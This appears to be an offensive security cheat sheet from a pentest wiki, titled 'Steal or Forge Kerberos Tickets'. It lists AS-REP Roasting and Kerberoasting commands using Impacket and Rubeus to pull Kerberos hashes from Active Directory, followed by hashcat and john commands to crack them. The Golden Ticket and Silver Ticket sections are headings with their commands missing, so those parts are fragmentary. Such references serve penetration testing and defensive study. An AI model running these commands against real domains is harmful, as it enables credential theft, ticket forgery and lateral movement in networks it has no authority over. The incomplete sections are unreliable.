Steal or Forge Kerberos Tickets
AS-REP Roasting
Check ASREPRoast for all domain users (credentials required)
GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>Check ASREPRoast for a list of users (no credentials required)
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>Check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>Cracking with dictionary of passwords:
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>john --wordlist=<passwords_file> <AS_REP_responses_file>Kerberoasting
Impacket
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>Rubeus
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>PowerShell
Cracking with dictionary of passwords:
Golden Ticket
Impacket
Mimikatz
To generate the TGT with NTLM
To generate the TGT with AES 128 key
To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
Inject TGT with Mimikatz
Rubeus
Execute a cmd in the remote machine:
Misc
To get NTLM from password:
Silver Ticket
Impacket
Mimikatz
To generate the TGS with NTLM
To generate the TGS with AES 128 key
To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
Inject TGS with Mimikatz
Rubeus
Execute a cmd in the remote machine with PsExec:
Last updated
Was this helpful?